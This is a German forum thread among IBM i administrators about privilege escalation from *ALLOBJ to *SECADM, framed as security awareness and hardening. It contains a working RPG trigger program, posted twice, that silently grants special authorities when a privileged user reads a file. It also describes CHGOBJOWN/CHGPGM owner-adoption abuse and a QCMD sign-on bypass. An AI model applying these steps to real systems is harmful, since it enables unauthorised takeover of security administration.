Mit Java holt man sich Sicherheitslücken ins Haus...

[EFueloep]

... Temporäre *ALLOBJ Berechtigung, auch per adopted authority geerbte, reicht aus, um sich alle Berechtigungen selber zu vergeben.

Na ja, dies ist aber dann keine Sicherheitslücke. Wenn ich mit einem User temporär *ALLOBJ und eine Command Zeile habe dann ist natürlich klar, das ich alles machen kann.
Dazu brauche ich dann gar nicht mehr ADDJOBSCDE.

Stellt sich nur die Frage wieso müssen immer so viele User *ALLOBJ Sonderrechte haben?

Dies ist nämlich leider die "einfache" (eigentlich total unsinnige!) Methode vieler SW Häuser allen Berechtigungsproblemen aus dem Weg zu gehen. Sie lassen die Applikation nur mit Usern, die *ALLOBJ haben laufen.

[BenderD]

... dem ist so nicht zuzustimmen, *ALLOBJ impliziert keineswegs *SECADM und das aus gutem Grund.

[Fuerchau]

Aber, wie Dieter schon schreibt und ich schon vielfach nachgewiesen habe, mit *ALLOBJ kann ich mir *SECADM beschaffen.

[BenderD]

... und *ALLOBJ kriege ich schon, wenn ich ein Programm finde, das adopted Authority weitergibt und noch was über *LIBL aufruft; und falls ich keine Commandline habe, fällt mir auch noch etliches ein, und falls da ein Tool sitzt, das andere Aufruf Interfaces überwacht, läuft das wieder unter *ALLOBJ und ruft was auf...

D*B

[holgerscherer]

... und *ALLOBJ kriege ich schon, wenn ich ein Programm finde, das adopted Authority weitergibt und noch was über *LIBL aufruft; und falls ich keine Commandline habe, fällt mir auch noch etliches ein, und falls da ein Tool sitzt, das andere Aufruf Interfaces überwacht, läuft das wieder unter *ALLOBJ und ruft was auf...
D*B

Erste Regel ist halt - LMTCPB(*YES) für alle! Und dann sehen wir weiter, wer gute Argumente hat...

Neulich auch gesehen: Signon-Programm für alle *SECOFR mit zweiter Passwort-Nachfrage zur Sicherheit. Aber vergessen, dass man beim Anmelden als Startprogramm auch QCMD angeben kann

-h

[BenderD]

... haste schon mal einen Programmierer mit LMTCB(*YES) gesehen?
D*B

[CKA]

Aber, wie Dieter schon schreibt und ich schon vielfach nachgewiesen habe, mit *ALLOBJ kann ich mir *SECADM beschaffen.

aha und wie ? würde mich echt interessieren ob man *secadm rechte beschaffen kann ...

[malzusrex]

Mit Gedult und Spucke

spontan fällt mir da folgendes ein:

1.) Schreibe ein kleines Triggerprogramm

PHP-Code:

h dftactgrp(*no) bnddir('QC2LE')                                           
h datfmt(*dmy.) timfmt(*hms:) datedit(*dmy.) decedit('0,') debug(*yes)     
d True            c                   *On                                  
d False           c                   *Off                                 
d parm1           ds         32768                                         
d parm2           ds                                                       
d system          pr            10i 0 extproc('system')                    
d                                 *   value options(*string)               
c     *Entry        PList                                                  
c     parm1         parm                    parm1                          
c     parm2         parm                    parm2                          
c                   Eval       *inlr = True                                
c                   CallP      System( 'chgusrprf usrprf(MyUser) ' +         
c                                      ' spcaut(*Secadm *AllObj)' ) 


2.) Trigger auf eine Datei klemmen die häufig benötigt, aber eben auch mal frei ist um den trigger ran zu tackern. AUf die Read-Op reicht ja

3.) Warten bis ein User mit ausreichend Berechtigung auf der Datei vorbei schaut.

Und schon hat man *SECADM

Gruß
Ronald

[nico1964]

Und wenn Du dann noch Glück hast und täglich ein IPL stattfindet, dann hast überhaupt kein Problem den richtigen Zeitpunkt zu erwischen

[CKA]

@nico1964
kannst du mir da mal mehr Infos dazu geben ?
Ist halt schon gut zu Wissen welche Tricks es gibt um sein System sicherer zu machen .
Also das mit *allobj hab ich gefressen

[BenderD]

... dazu braucht es nicht mal *ALLOBJ...
und auf den mesiten Maschinen wird nicht einmal das Audit Journal eingesetzt...

Mit Gedult und Spucke

spontan fällt mir da folgendes ein:

1.) Schreibe ein kleines Triggerprogramm

PHP-Code:

h dftactgrp(*no) bnddir('QC2LE')                                           
h datfmt(*dmy.) timfmt(*hms:) datedit(*dmy.) decedit('0,') debug(*yes)     
d True            c                   *On                                  
d False           c                   *Off                                 
d parm1           ds         32768                                         
d parm2           ds                                                       
d system          pr            10i 0 extproc('system')                    
d                                 *   value options(*string)               
c     *Entry        PList                                                  
c     parm1         parm                    parm1                          
c     parm2         parm                    parm2                          
c                   Eval       *inlr = True                                
c                   CallP      System( 'chgusrprf usrprf(MyUser) ' +         
c                                      ' spcaut(*Secadm *AllObj)' ) 


2.) Trigger auf eine Datei klemmen die häufig benötigt, aber eben auch mal frei ist um den trigger ran zu tackern. AUf die Read-Op reicht ja

3.) Warten bis ein User mit ausreichend Berechtigung auf der Datei vorbei schaut.

Und schon hat man *SECADM

Gruß
Ronald

[Fuerchau]

Sobald ich *ALLOBJ habe kann ich mit ein wenig Energie mir SECADM geben.
Auch ohne PDM o.ä. kann ich per SQL (z.B. OpsNav, u.v.a.) ein CLP obiger Art schreiben.
Immerhin kann man ja auch QCMDEXC aus CLP aufrufen, da verhindert der Compiler eben nichts!

Mittels *ALLOBJ kann ich dem QSECOFR Objekte zuordnen CHGOBJOWN und dann per CHGPGM ... USRPRF(*OWNER) alles machen, was der QSECOFR darf, also auch einen CHGUSRPRF.